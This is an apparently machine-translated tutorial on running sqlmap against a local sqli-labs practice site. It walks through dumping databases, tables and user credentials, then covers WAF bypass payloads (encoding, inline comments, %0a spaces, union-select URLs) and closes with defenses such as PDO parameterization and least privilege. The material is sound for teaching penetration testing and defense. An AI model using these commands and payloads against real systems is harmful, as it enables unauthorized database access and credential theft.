Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to analyze SQLMap and SQLi injection defense, which may not be well understood by many people. In order to make you understand better, the editor has summarized the following for you. I hope you can get something according to this article.

Part one: introduction to the use of 1.1 sqlmap in Sqlmap

1. I said some basic statements of sql injection before, but manual injection is very troublesome. We can get the data with the help of sqlmap, a powerful sql injection tool.

2. Sqlmap introduction

(1) # sqlmap is an open source penetration testing tool that automatically detects and exploits SQL injection vulnerabilities and

The server that accesses the database. It has a very powerful detection engine, a penetration tester with a variety of characteristics, access the underlying file system through database fingerprint extraction and execute commands through an out-of-band connection.

Official website: sqlmap.org

(2) # supported databases:

MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft

Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB .

(3) # multiple injection methods are supported

# UNION query SQL injection (can be injected into federated queries)

# Error-based SQL injection (error injection)

# Boolean-based blind SQL injection (Boolean injection)

# Time-based blind SQL injection (based on time delay injection)

# Stacked queries SQL injection (multiple statements can be queried and injected)

1.2 sqlmap installation and environment building

Main steps of 1.sqlmap installation

(1) install python environment-> sqlmap requires python environment

Python download address: https://www.python.org/downloads/release/python-2715/)

Sqlmap is better compatible with Python2.X version. (the installation step of python is the next step. What you need to modify is the installation path of sqlmap. Here, it is changed to C:\ Users\ Administrator\ python. In order to directly enter the sqlmap directory on the command line, it is easier to operate.)

(2) do not install Python under the Chinese path, and add Python to the environment variable.

(3) download and install sqlmap, and modify the installation directory to C:\ Users\ Administrator\ sqlmap

(4) Test python environment: enter the cmd command line and enter python. The following prompt indicates that the installation is successful.

C:\ Users\ Administrator > python

Python 2.7.16 (v2.7.16:413a49145e, Mar 4 2019, 01:37:19) [MSC v.1500 64 bit (AMD64)] on win32

Type "help", "copyright", "credits" or "license" for more information.

> > exit ()

(5) sqlmap test: enter the cmd command line and enter sqlmap.py-h (note the path)

C:\ Users\ Administrator\ sqlmap > sqlmap.py-h # View help information

1.3Common parameters of sqlmap

# (1) obtain library name, column name and permission

-- dbs # get all databases

-- dbms mysql # specify the database type

-- users # all database users (database local user names)

-- passwords # get the database password (read only if you have permission)

-- technique # specifies which injection type to use

-- current-db # current database

-- banner # get the database ID

-D database_name-- tables #-D is used to specify data, and-- tables gets the table under a library

-D database_name-T table_name-- columns #-T specifies the table name,-- columns gets the column field

-D database_name-T table_name-C column_1,column_2-- dump

#-C specifies the field name,-- dump displays the result

-- users # column database administrative users, all administrative users can be listed when the current user has permission to read the table that contains all users.

-- current-user # users who can obtain management data in most databases.

-- is-dba # determines whether the current user is an administrator, and returns True if so.

-- privileges # when the current user has permission to read tables that contain all users, it is likely to enumerate the permissions of each user, and sqlmap will tell you which is the super administrator of the database. You can also use the-U parameter to specify the permissions of the user you want to see.

-- proxy # specify a proxy server eg:-proxy http://local:8080

# (2) specify the suffix:

# sqlmap cannot detect many interfering characters. Prefixes and suffixes can be specified manually when closing.

Select * from users where id= ('1') and 1

#-prefix=PREFIX injection payload string prefix

#-suffix=SUFFIX injects payload string suffix

Eg:sqlmap-u "www.target.com/index.php?id=1"-p id-- prefix "')"

-- suffix "AND"

# (3) Export results:

Sqlmap-u "www.a.com/1.php?id=1"-file-write= "d:/1.txt"

-file-dest= "E:/wwwroot/web/one.php"

-- batch fully automatic

-- number of start= start messages-- number of stop= end messages

-- dump exports data

-- dump-all exports all data

-- purge-output/-- purge clears the cache directory

-- sql-shell bounce sqlshell, similar to sql query Analyzer default path .sqlmap (dot sqlmap)

1.4 practical examples of sqlmap

# Less-1--Less65 general statement (these are the most commonly used parameters, must be)

# (1) get all library names

C:\ Users\ Administrator\ sqlmap > python sqlmap.py-u "http://localhost/sqli/Less-1?id=1"-- dbs-- dbms=mysql-- batch

# Resolution:

-u followed by url to indicate the url of the test

-- dbs means to get all databases

-- dbms indicates that the specified database type is mysql

-- batch means automatic acquisition

-D security-- tables means to get the table name of the specified database as security

-D security-T users-- columns indicates to get the column names in the users table of the specified database in security

-D security-T users-C username,password-- dump # gets the security library, data information of the username and password fields in the users table,-- dump indicates the display result

# results:

[*] challenges

[*] dvwa

[*] information_schema

[*] mysql

[*] owasp

[*] performance_schema

[*] security

[*] test

# (2) get the current library name

C:\ Users\ Administrator\ sqlmap > python sqlmap.py-u "http://localhost/sqli/Less-1?id=1"-- current-db-- batch

# results:

Current database: 'security'

# (3) get the current table name

C:\ Users\ Administrator\ sqlmap > python sqlmap.py-u "http://localhost/sqli/Less-1?id=1"-D security-- tables-- batch

# results:

Database: security

[4 tables]

+-+

| | emails |

| | referers |

| | uagents |

| | users |

+-+

# (4) get the current column name

C:\ Users\ Administrator\ sqlmap > python sqlmap.py-u "http://localhost/sqli/Less-1?id=1"-D security-T users-- columns-- batch

# results:

Database: security

Table: users

[3 columns]

+-+ +

| | Column | Type |

+-+ +

| | id | int (3) |

| | password | varchar (20) |

| | username | varchar (20) |

+-+ +

# (5) get the contents of username and password in users table

C:\ Users\ Administrator\ sqlmap > python sqlmap.py-u "http://localhost/sqli/Less-1?id=1"-D security-T users-C username,password-- dump-- batch

# results:

Database: security

Table: users

[13 entries]

+-+ +

| | username | password |

+-+ +

| | Dumb | Dumb |

| | Angelina | I-kill-you |

| | Dummy | p@ssword |

| | secure | crappy |

| | stupid | stupidity |

| | superman | genious |

| | batman | Mobile | |

| | admin | admin |

| | admin1 | admin1 |

| | admin2 | admin2 |

| | admin3 | admin3 |

| | dhakkan | dumbo |

| | admin4 | admin4 |

+-+ +

Part II: introduction of sqli injection waf Bypass 2.1SQL injection waf Bypass method

Explanation: here is only an example to illustrate the way to bypass, the actual scene is more complex. A variety of bypass methods can be mixed and coded.

1. Once you know how to inject sql, how can you prevent sql injection?

# (1) filter comments

# (2) filter and or or

# (3) filter select or union

# (4) filter blacklist

two。 What are the ways to filter and/or bypass?

# (1) mysql is case-insensitive and can be executed correctly; =

# (2) mysql supports hexadecimal, hexadecimal or URL encoding

# (3) replace the word = = > with symbols to bypass and (& &) or (| |)

# (4) inline comments and multiline comments = > add comments to sensitive words a/**/nd double write bypass oORr

3. Of course, there are other ways, let's take these filtering methods as an example to talk about how to bypass.

There are waf devices in the real scene, and waf actually prevents sql injection by filtering some keywords.

2.2 Bypass waf experiment of sql injection

1. The comment characters are filtered (Less-23 as an example)

# (1) the reason for filtering comments: for normal SQL statements, comments function as an explanation. However, in the process of exploiting SQL injection vulnerabilities, comment characters play the functions of closing single quotes, multiple single quotes, double quotes, single parentheses and multi-parentheses.

One-line comment:-- + or-- space or #

Multiline comment: / * multiline comment content * /

# (2) filter function preg_replace

Preg_replace (mixed $pattern, mixed $replacement, mixed $subject): performs a search and replacement of a regular expression.

$pattern: the pattern to search for, which can be a string or an array of strings

Replacement: the string or array of strings used for replacement.

Subject: the target string or array of strings to search for replacement.

# (3) Bypass the comments:

The single quotation marks can not be closed successfully by using the comment character filter, etc., in another way, the single quotation marks can be closed by using or'1, etc.

Http://127.0.0.1/sqli/Less-23/?id=-1%27%20union%20select%201,database(),%273

two。 How should and or or be bypassed after filtering? (Less-25 as an example)

(1) Source code analysis: you can see that or or and is replaced with null

(2) Operation steps

3. How do you get around filtering spaces? (Less-26 as an example)

(1) use% 0a as a space

4. How can I bypass select/union after filtering? (Less-27 as an example)

Part III: sqli injection defense 3.1 sql injection defense methods

1. Common protective measures:

# (1). Close error prompt: display_errors=Off in PHP configuration file php.ini

# (2), Magic quotation marks (same as addslashes): when magic_quotes_gpc=On in php.ini. All single quotation marks ('), double quotes ("), backslashes (\) and NUL (NULL characters) in submitted variables are automatically converted to escape characters containing backslashes.

# (3). Filter the data: for example, filter out common keywords such as and/or/union

# (4). Control the user rights to connect to the database: each library sets up an administrator for a single library, do not use root permissions.

# (5), preprocessing and parameterization (PDO): handle the parameters passed by the user and return a Boolean value, not simply "stitching" the data, so as to avoid sql injection.

# (6), hardware protection measures (WAF and other hardware)

After reading the above, do you have any further understanding of how to analyze SQLMap and SQLi injection defense? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.